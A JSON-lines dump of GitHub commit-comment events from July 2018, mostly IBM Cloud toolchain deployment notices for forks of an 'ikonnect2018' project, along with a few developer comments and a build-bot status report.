{"id":"8031775163","type":"CommitCommentEvent","actor":{"login":"jonabelibels"},"repo":{"name":"jonabelibels/ikonnect2018"},"payload":{"comment":{"id":29866882,"position":null,"line":null,"path":null,"commit_id":"ee6ac5e23fb22ebe13f25a21a7db89b75296cc78","created_at":"2018-07-28T06:29:30Z","updated_at":"2018-07-28T06:29:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e4e5aa30-8a62-4378-92ba-38c83379e212?env_id=ibm%3Ayp%3Aus-south \"ikonnect-jonabel\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/374678c2-6601-4a62-a17a-ce40621aae12?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-Jonabel\") deployed [ikonnect2018](https://github.com/jonabelibels/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-meridaj-ph.ibm.com-dev-20180728-062929 \"deploy-ibm-yp-us-south-meridaj-ph.ibm.com-dev-20180728-062929\") to [dev](https://console.bluemix.net/apps/0739e6e2-d9a0-4333-8993-87c930c0b4a7?env_id=ibm:yp:us-south \"ibm:yp:us-south:meridaj@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:29:30Z"}
{"id":"8031775236","type":"CommitCommentEvent","actor":{"login":"seph01"},"repo":{"name":"seph01/ikonnect2018"},"payload":{"comment":{"id":29866883,"position":null,"line":null,"path":null,"commit_id":"9af8fbbd2e84473a9ea35f585d825557ed4acbab","created_at":"2018-07-28T06:29:35Z","updated_at":"2018-07-28T06:29:35Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e8b56284-f482-445c-a366-bca2dd32394e?env_id=ibm%3Ayp%3Aus-south \"iKonnect-igartajoseph\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/7f13a238-494f-48e4-978c-e1cb24614c81?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-igartajoseph\") deployed [ikonnect2018](https://github.com/seph01/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-igartaj-ph.ibm.com-dev-20180728-062934 \"deploy-ibm-yp-us-south-igartaj-ph.ibm.com-dev-20180728-062934\") to [dev](https://console.bluemix.net/apps/aac92405-0c57-4957-9fe3-1a6c023b9d02?env_id=ibm:yp:us-south \"ibm:yp:us-south:igartaj@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:29:35Z"}
{"id":"8031775367","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866884,"position":null,"line":null,"path":null,"commit_id":"b89cce16b9ef1483e8afbe979d3fbbbe9f0e4b7c","created_at":"2018-07-28T06:29:41Z","updated_at":"2018-07-28T06:29:41Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-062940 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-062940\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:29:41Z"}
{"id":"8031776455","type":"CommitCommentEvent","actor":{"login":"annesalgado"},"repo":{"name":"annesalgado/ikonnect2018"},"payload":{"comment":{"id":29866892,"position":null,"line":null,"path":null,"commit_id":"64d72aad645d27dda352cdeee5dc6a257a1a9d14","created_at":"2018-07-28T06:30:33Z","updated_at":"2018-07-28T06:30:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ad96ae13-df84-42ec-9f84-10fead8754da?env_id=ibm%3Ayp%3Aus-south \"iKonnect-AnneSalgado\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/24343d28-b262-440a-ae50-5d4d95717fd0?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-AnneSalgado\") deployed [ikonnect2018](https://github.com/annesalgado/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-salgadar-ph.ibm.com-dev-20180728-063032 \"deploy-ibm-yp-us-south-salgadar-ph.ibm.com-dev-20180728-063032\") to [dev](https://console.bluemix.net/apps/54157250-9066-4598-b64b-263fb36975de?env_id=ibm:yp:us-south \"ibm:yp:us-south:salgadar@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:30:33Z"}
{"id":"8031777343","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866893,"position":13,"line":13,"path":"part3/1-months.rb","commit_id":"0712a07ce21c008a26fb45e294dd9e94432fa0ee","created_at":"2018-07-28T06:31:16Z","updated_at":"2018-07-28T06:31:16Z","author_association":"NONE","body":"не ошибка, просто для информации\r\nрекомендуется форматироват хеши либо вот так:\r\n```ruby\r\nmonths = { January: 31,\r\n                  February: 28,\r\n                  .....\r\n                  November: 30,\r\n                  December: 31 }\r\n```\r\nлибо вот так:\r\n```ruby\r\nmonths = {\r\n  January: 31,\r\n  February: 28,\r\n  .....\r\n  November: 30,\r\n  December: 31\r\n}\r\n```"}},"created_at":"2018-07-28T06:31:16Z"}
{"id":"8031777880","type":"CommitCommentEvent","actor":{"login":"RicoVergara"},"repo":{"name":"RicoVergara/ikonnect2018"},"payload":{"comment":{"id":29866896,"position":null,"line":null,"path":null,"commit_id":"036514abc8a1620164e411fffdfd4967701b02a2","created_at":"2018-07-28T06:31:46Z","updated_at":"2018-07-28T06:31:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8aa787c2-b105-400e-a249-6b38d1494713?env_id=ibm%3Ayp%3Aus-south \"iKonnect-RicoVergara\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/67f575fb-9bff-4d71-85f8-07c552284034?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-RicoVergara\") deployed [ikonnect2018](https://github.com/RicoVergara/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063146 \"deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063146\") to [Dev](https://console.bluemix.net/apps/358686ca-12d5-422c-96f7-8087e136e457?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:vergare@ph.ibm.com:Dev\"), including this commit"}},"created_at":"2018-07-28T06:31:46Z"}
{"id":"8031777966","type":"CommitCommentEvent","actor":{"login":"merbaula"},"repo":{"name":"merbaula/ikonnect2018"},"payload":{"comment":{"id":29866899,"position":null,"line":null,"path":null,"commit_id":"f762348166c47df86e836e8d8aea8dd87fa0a29c","created_at":"2018-07-28T06:31:51Z","updated_at":"2018-07-28T06:31:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/54c261f0-acaa-409c-b80e-c436e9bbbc5e?env_id=ibm%3Ayp%3Aus-south \"iKonnect-MER\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/e16c435b-0730-4d97-8914-9e0f2adf45f7?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-MER\") deployed [ikonnect2018](https://github.com/merbaula/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-9baulama-ph.ibm.com-dev-20180728-063150 \"deploy-ibm-yp-au-syd-9baulama-ph.ibm.com-dev-20180728-063150\") to [dev](https://console.bluemix.net/apps/ac7f9264-83d3-4559-b68e-08a5ba3a68bd?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:9baulama@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:31:51Z"}
{"id":"8031778578","type":"CommitCommentEvent","actor":{"login":"gladdenmac"},"repo":{"name":"gladdenmac/ikonnect2018"},"payload":{"comment":{"id":29866901,"position":null,"line":null,"path":null,"commit_id":"d76635a5a40858bb269f0f403e1f6c21c22ccd8e","created_at":"2018-07-28T06:32:25Z","updated_at":"2018-07-28T06:32:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/640d7b8e-7eff-4a5f-a2fe-7bc745ce981f?env_id=ibm%3Ayp%3Aus-south \"iKonnect-gladden\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/6958b593-fec2-4358-8a8b-088f2a581ddf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-gladden\") deployed [ikonnect2018](https://github.com/gladdenmac/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-063224 \"deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-063224\") to [dev](https://console.bluemix.net/apps/241a3d46-8c77-4701-95a8-a2d3726bb410?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:macalig@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:32:25Z"}
{"id":"8031779480","type":"CommitCommentEvent","actor":{"login":"RicoVergara"},"repo":{"name":"RicoVergara/ikonnect2018"},"payload":{"comment":{"id":29866904,"position":null,"line":null,"path":null,"commit_id":"eb855c8b93d7f5b679468c3e8e181efde0aceef0","created_at":"2018-07-28T06:33:13Z","updated_at":"2018-07-28T06:33:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8aa787c2-b105-400e-a249-6b38d1494713?env_id=ibm%3Ayp%3Aus-south \"iKonnect-RicoVergara\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/67f575fb-9bff-4d71-85f8-07c552284034?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-RicoVergara\") deployed [ikonnect2018](https://github.com/RicoVergara/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063313 \"deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063313\") to [Dev](https://console.bluemix.net/apps/358686ca-12d5-422c-96f7-8087e136e457?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:vergare@ph.ibm.com:Dev\"), including this commit"}},"created_at":"2018-07-28T06:33:13Z"}
{"id":"8031779566","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866905,"position":null,"line":null,"path":null,"commit_id":"e74e768c405a58f4a4bdcd8201ad33c7683b2df1","created_at":"2018-07-28T06:33:19Z","updated_at":"2018-07-28T06:33:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-063318 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-063318\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:33:19Z"}
{"id":"8031779646","type":"CommitCommentEvent","actor":{"login":"joseje25"},"repo":{"name":"joseje25/ikonnect2018"},"payload":{"comment":{"id":29866906,"position":null,"line":null,"path":null,"commit_id":"117cdbc15428f09f0650bafec90c55667e7cf8f7","created_at":"2018-07-28T06:33:22Z","updated_at":"2018-07-28T06:33:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/b25a1d17-c6a4-40a9-8c2c-82a71943ae89?env_id=ibm%3Ayp%3Aus-south \"ikonnect\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bf76532f-b2f1-4134-8e98-551760ccd3f3?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018_juliet\") deployed [ikonnect2018](https://github.com/joseje25/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-Juliet-DST-20180728-063321 \"deploy-ibm-yp-us-south-Juliet-DST-20180728-063321\") to [DST](https://console.bluemix.net/apps/922d8e37-69a7-4e6f-a561-496f746d5337?env_id=ibm:yp:us-south \"ibm:yp:us-south:Juliet:DST\"), including this commit"}},"created_at":"2018-07-28T06:33:22Z"}
{"id":"8031779698","type":"CommitCommentEvent","actor":{"login":"banogoj"},"repo":{"name":"banogoj/iKonnect2018"},"payload":{"comment":{"id":29866907,"position":null,"line":null,"path":null,"commit_id":"2e03462d53f351f552c25a51e2fb43d3f424e5ca","created_at":"2018-07-28T06:33:25Z","updated_at":"2018-07-28T06:33:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/cbcb0fe8-4003-4d60-80ea-f12cd092bc59?env_id=ibm%3Ayp%3Aus-south \"iKonnect-JemalynBanogon\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/e594ee19-9bc3-493e-8742-28197559a012?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-JemalynBanogon\") deployed [iKonnect2018](https://github.com/banogoj/iKonnect2018/releases/tag/deploy-ibm-yp-us-south-hrtophit_org-Development-20180728-063324 \"deploy-ibm-yp-us-south-hrtophit_org-Development-20180728-063324\") to [Development](https://console.bluemix.net/apps/5a8514d6-836c-41fd-b3cc-c6ee9f8f034a?env_id=ibm:yp:us-south \"ibm:yp:us-south:hrtophit_org:Development\"), including this commit"}},"created_at":"2018-07-28T06:33:25Z"}
{"id":"8031779927","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"Extum/flarum-ext-material"},"payload":{"comment":{"id":29866908,"position":null,"line":null,"path":null,"commit_id":"4943205e3802829e9f63239b2874254898879362","created_at":"2018-07-28T06:33:37Z","updated_at":"2018-07-28T06:33:37Z","author_association":"MEMBER","body":"What is this for? @Nathan2023 "}},"created_at":"2018-07-28T06:33:37Z"}
{"id":"8031780289","type":"CommitCommentEvent","actor":{"login":"acorreyes"},"repo":{"name":"acorreyes/ikonnect2018"},"payload":{"comment":{"id":29866910,"position":null,"line":null,"path":null,"commit_id":"012f0fea30234e7aa8fd1d15eff3b1ebc74d1f36","created_at":"2018-07-28T06:34:00Z","updated_at":"2018-07-28T06:34:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/9ff88ff5-cb1d-4e9f-a742-35736c6b6454?env_id=ibm%3Ayp%3Aus-south \"iKonnect-acorreyes\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/0ba9d4e5-a428-40d1-8790-39ba113c499f?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-acorreyes\") deployed [ikonnect2018](https://github.com/acorreyes/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-9reyesmm-ph.ibm.com-dev-20180728-063359 \"deploy-ibm-yp-au-syd-9reyesmm-ph.ibm.com-dev-20180728-063359\") to [dev](https://console.bluemix.net/apps/de986a5e-a636-4e82-9984-94fc6eeb7cdc?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:9reyesmm@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:34:00Z"}
{"id":"8031780411","type":"CommitCommentEvent","actor":{"login":"Mel-13"},"repo":{"name":"Mel-13/ikonnect2018"},"payload":{"comment":{"id":29866911,"position":null,"line":null,"path":null,"commit_id":"eea90ae717e554d8b200dee4559d02fa91fab02d","created_at":"2018-07-28T06:34:07Z","updated_at":"2018-07-28T06:34:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a7d8821e-4328-4067-a4b8-51f135df2841?env_id=ibm%3Ayp%3Aus-south \"InputiKonnect - Mel Alvin Yanga\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/93c6cb81-b3e5-484b-8c78-27a79ef9fcdf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018\") deployed [ikonnect2018](https://github.com/Mel-13/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-Accounts-Payable-dev-20180728-063406 \"deploy-ibm-yp-au-syd-Accounts-Payable-dev-20180728-063406\") to [dev](https://console.bluemix.net/apps/cb339ed3-df9e-4ce8-a752-2521d21b2c57?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:Accounts Payable:dev\"), including this commit"}},"created_at":"2018-07-28T06:34:07Z"}
{"id":"8031780538","type":"CommitCommentEvent","actor":{"login":"ostrakinos"},"repo":{"name":"ostrakinos/ikonnect2018"},"payload":{"comment":{"id":29866912,"position":null,"line":null,"path":null,"commit_id":"82d0e53f638b9b2d16812652364e1013d0f601b8","created_at":"2018-07-28T06:34:14Z","updated_at":"2018-07-28T06:34:14Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5ecd7220-9eb8-4fc0-b184-1908dbf69ec3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-mags\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/60860c60-1080-4446-a27e-a32dac39331a?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-mags\") deployed [ikonnect2018](https://github.com/ostrakinos/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-m.s.sagampod-ph.ibm.com-ikonnect2018-mags-20180728-063413 \"deploy-ibm-yp-us-south-m.s.sagampod-ph.ibm.com-ikonnect2018-mags-20180728-063413\") to [ikonnect2018-mags](https://console.bluemix.net/apps/350a43e2-09fa-4e4f-9676-81430a68d3c8?env_id=ibm:yp:us-south \"ibm:yp:us-south:m.s.sagampod@ph.ibm.com:ikonnect2018-mags\"), including this commit"}},"created_at":"2018-07-28T06:34:14Z"}
{"id":"8031780829","type":"CommitCommentEvent","actor":{"login":"ablodge"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29866913,"position":5,"line":29,"path":"scripts/articles_for_import.py","commit_id":"697484023bf61e6d8f4e668dec5e5e4e41ce105f","created_at":"2018-07-28T06:34:28Z","updated_at":"2018-07-28T06:34:28Z","author_association":"CONTRIBUTOR","body":"#121 This is the problem\r\n\r\n> For step 12, it is not finding any new construal articles. Is that correct? AFAICT these articles already have the correct usage links."}},"created_at":"2018-07-28T06:34:28Z"}
{"id":"8031780839","type":"CommitCommentEvent","actor":{"login":"joseje25"},"repo":{"name":"joseje25/ikonnect2018"},"payload":{"comment":{"id":29866914,"position":null,"line":null,"path":null,"commit_id":"4620622be8bafab2a2ff504ce7c7bf8cd9ad3858","created_at":"2018-07-28T06:34:29Z","updated_at":"2018-07-28T06:34:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/b25a1d17-c6a4-40a9-8c2c-82a71943ae89?env_id=ibm%3Ayp%3Aus-south \"ikonnect\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bf76532f-b2f1-4134-8e98-551760ccd3f3?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018_juliet\") deployed [ikonnect2018](https://github.com/joseje25/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-Juliet-DST-20180728-063428 \"deploy-ibm-yp-us-south-Juliet-DST-20180728-063428\") to [DST](https://console.bluemix.net/apps/922d8e37-69a7-4e6f-a561-496f746d5337?env_id=ibm:yp:us-south \"ibm:yp:us-south:Juliet:DST\"), including this commit"}},"created_at":"2018-07-28T06:34:29Z"}
{"id":"8031780851","type":"CommitCommentEvent","actor":{"login":"RicoVergara"},"repo":{"name":"RicoVergara/ikonnect2018"},"payload":{"comment":{"id":29866915,"position":null,"line":null,"path":null,"commit_id":"b27be61dc51dfc83fc4b78db8e5931079c8b81cb","created_at":"2018-07-28T06:34:29Z","updated_at":"2018-07-28T06:34:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8aa787c2-b105-400e-a249-6b38d1494713?env_id=ibm%3Ayp%3Aus-south \"iKonnect-RicoVergara\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/67f575fb-9bff-4d71-85f8-07c552284034?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-RicoVergara\") deployed [ikonnect2018](https://github.com/RicoVergara/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063429 \"deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063429\") to [Dev](https://console.bluemix.net/apps/358686ca-12d5-422c-96f7-8087e136e457?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:vergare@ph.ibm.com:Dev\"), including this commit"}},"created_at":"2018-07-28T06:34:29Z"}
{"id":"8031781214","type":"CommitCommentEvent","actor":{"login":"isaisat"},"repo":{"name":"isaisat/ikonnect2018"},"payload":{"comment":{"id":29866917,"position":null,"line":null,"path":null,"commit_id":"5aeb6f83b844cee1063c70d7d4fbf69017f39fcd","created_at":"2018-07-28T06:34:48Z","updated_at":"2018-07-28T06:34:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/cc0e95a4-f890-4407-8d1d-caedbd047bed?env_id=ibm%3Ayp%3Aus-south \"ikonnect-albertoisais\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/0eccfde2-fbc1-4e96-988b-c2087b859721?env_id=ibm%3Ayp%3Aus-south \"Pipeline\") deployed [ikonnect2018](https://github.com/isaisat/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-theDreamers_org-Development-20180728-063447 \"deploy-ibm-yp-us-south-theDreamers_org-Development-20180728-063447\") to [Development](https://console.bluemix.net/apps/ab6dfccd-8183-454c-8d91-ff27c9cdc1ae?env_id=ibm:yp:us-south \"ibm:yp:us-south:theDreamers_org:Development\"), including this commit"}},"created_at":"2018-07-28T06:34:48Z"}
{"id":"8031781319","type":"CommitCommentEvent","actor":{"login":"darederil"},"repo":{"name":"darederil/ikonnect2018"},"payload":{"comment":{"id":29866920,"position":null,"line":null,"path":null,"commit_id":"c63bfd47faf5aa5586300ff5b701afef2a9f40d8","created_at":"2018-07-28T06:34:54Z","updated_at":"2018-07-28T06:34:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/0d578a39-ec70-4292-9f41-753349af9929?env_id=ibm%3Ayp%3Aus-south \"iKonnect-ErilCapistrano\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5b64f09b-821c-4fc4-a469-37f4a2a88cf5?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-ErilCapistrano\") deployed [ikonnect2018](https://github.com/darederil/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-innovatorsAtTheirBest-test-20180728-063454 \"deploy-ibm-yp-us-south-innovatorsAtTheirBest-test-20180728-063454\") to [test](https://console.bluemix.net/apps/ce117cea-1185-4277-b21b-ad4e2ae9474f?env_id=ibm:yp:us-south \"ibm:yp:us-south:innovatorsAtTheirBest:test\"), including this commit"}},"created_at":"2018-07-28T06:34:54Z"}
{"id":"8031781391","type":"CommitCommentEvent","actor":{"login":"saineshwar"},"repo":{"name":"saineshwar/ASP.NET-CORE-MVC-Project-Event-Management"},"payload":{"comment":{"id":29866921,"position":null,"line":null,"path":null,"commit_id":"1dfeec33215401383151251f4da889ea29888da3","created_at":"2018-07-28T06:34:58Z","updated_at":"2018-07-28T06:34:58Z","author_association":"OWNER","body":"Check TimesheetDB.rar in Branch.\r\n\r\n![image](https://user-images.githubusercontent.com/8281689/43353813-5ead4c9a-925e-11e8-8a3b-0f8e4f045e89.png)\r\n"}},"created_at":"2018-07-28T06:34:58Z"}
{"id":"8031781861","type":"CommitCommentEvent","actor":{"login":"ocampopb"},"repo":{"name":"ocampopb/ikonnect2018"},"payload":{"comment":{"id":29866923,"position":null,"line":null,"path":null,"commit_id":"07a54fb521c6f426c9a3944f5fc721c0a3137f2c","created_at":"2018-07-28T06:35:24Z","updated_at":"2018-07-28T06:35:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5dacaddb-c170-4521-a198-c609e8691afe?env_id=ibm%3Ayp%3Aus-south \"iKonnect-paulocampo\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/efd27131-a668-408f-99b9-12726893e71f?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-paulocampo\") deployed [ikonnect2018](https://github.com/ocampopb/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-ocampopb-ph.ibm.com-dev-20180728-063524 \"deploy-ibm-yp-us-south-ocampopb-ph.ibm.com-dev-20180728-063524\") to [dev](https://console.bluemix.net/apps/67e0ce5e-4041-43c6-89e9-5a33535115d9?env_id=ibm:yp:us-south \"ibm:yp:us-south:ocampopb@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:35:24Z"}
{"id":"8031781970","type":"CommitCommentEvent","actor":{"login":"lopezlj"},"repo":{"name":"lopezlj/ikonnect2018"},"payload":{"comment":{"id":29866924,"position":null,"line":null,"path":null,"commit_id":"4462d8457b1b7a60b6cb88983edacd444b85a0b5","created_at":"2018-07-28T06:35:29Z","updated_at":"2018-07-28T06:35:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a981739a-9799-4b5a-870c-2ffea876191a?env_id=ibm%3Ayp%3Aus-south \"iKonnect-lovelle\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/0d97f895-29bd-4303-902b-5ed8f4c3587c?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-lovelle\") deployed [ikonnect2018](https://github.com/lopezlj/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-lopezlj-ph.ibm.com-dev-20180728-063528 \"deploy-ibm-yp-us-south-lopezlj-ph.ibm.com-dev-20180728-063528\") to [dev](https://console.bluemix.net/apps/d4a974cb-a444-412e-8b1b-0b9e33089bc2?env_id=ibm:yp:us-south \"ibm:yp:us-south:lopezlj@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:35:29Z"}
{"id":"8031782361","type":"CommitCommentEvent","actor":{"login":"annesalgado"},"repo":{"name":"annesalgado/ikonnect2018"},"payload":{"comment":{"id":29866927,"position":null,"line":null,"path":null,"commit_id":"304c70b517bdae9c655e51b66b2a2005d72f267e","created_at":"2018-07-28T06:35:51Z","updated_at":"2018-07-28T06:35:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ad96ae13-df84-42ec-9f84-10fead8754da?env_id=ibm%3Ayp%3Aus-south \"iKonnect-AnneSalgado\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/24343d28-b262-440a-ae50-5d4d95717fd0?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-AnneSalgado\") deployed [ikonnect2018](https://github.com/annesalgado/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-salgadar-ph.ibm.com-dev-20180728-063551 \"deploy-ibm-yp-us-south-salgadar-ph.ibm.com-dev-20180728-063551\") to [dev](https://console.bluemix.net/apps/54157250-9066-4598-b64b-263fb36975de?env_id=ibm:yp:us-south \"ibm:yp:us-south:salgadar@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:35:51Z"}
{"id":"8031782572","type":"CommitCommentEvent","actor":{"login":"zero404"},"repo":{"name":"wsdzl/adao_id_search"},"payload":{"comment":{"id":29866928,"position":null,"line":null,"path":null,"commit_id":"727b5befd2a489dc86cc6f3c4d38c477a1d91681","created_at":"2018-07-28T06:36:04Z","updated_at":"2018-07-28T06:36:04Z","author_association":"NONE","body":"大佬....为什么V4.0下载解压后没有“开始”选项啊..."}},"created_at":"2018-07-28T06:36:04Z"}
{"id":"8031783062","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866933,"position":null,"line":null,"path":null,"commit_id":"7b685614a6f29ddc74b220a77efa0a902c38d3b6","created_at":"2018-07-28T06:36:33Z","updated_at":"2018-07-28T06:36:33Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T06:36:33Z"}
